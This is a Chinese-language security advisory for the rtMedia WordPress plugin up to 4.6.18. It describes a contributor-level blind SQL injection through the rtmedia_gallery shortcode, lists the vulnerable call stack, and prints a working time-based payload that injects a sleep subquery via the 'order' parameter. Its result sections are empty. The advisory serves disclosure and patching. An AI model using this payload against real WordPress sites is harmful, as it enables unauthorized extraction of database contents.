rtMedia for WordPress、BuddyPress 和 bbPress <= 4.6.18 - 通过 rtmedia_gallery 短代码导致的身份验证后(贡献者及以上权限)SQL 注入
描述
WordPress 的 rtMedia for WordPress、BuddyPress 和 bbPress 插件在所有版本(最高至 4.6.18,含 4.6.18)中,因对用户提供的参数转义不足以及对现有 SQL 查询缺乏充分预处理,存在通过 rtmedia_gallery 短代码导致的盲 SQL 注入漏洞。这使得拥有贡献者(Contributor)及以上访问权限的已认证攻击者能够向现有查询中追加额外的 SQL 查询,从而从数据库中提取敏感信息。
调用堆栈
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Payload:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Payload 为真:

Payload 为假:
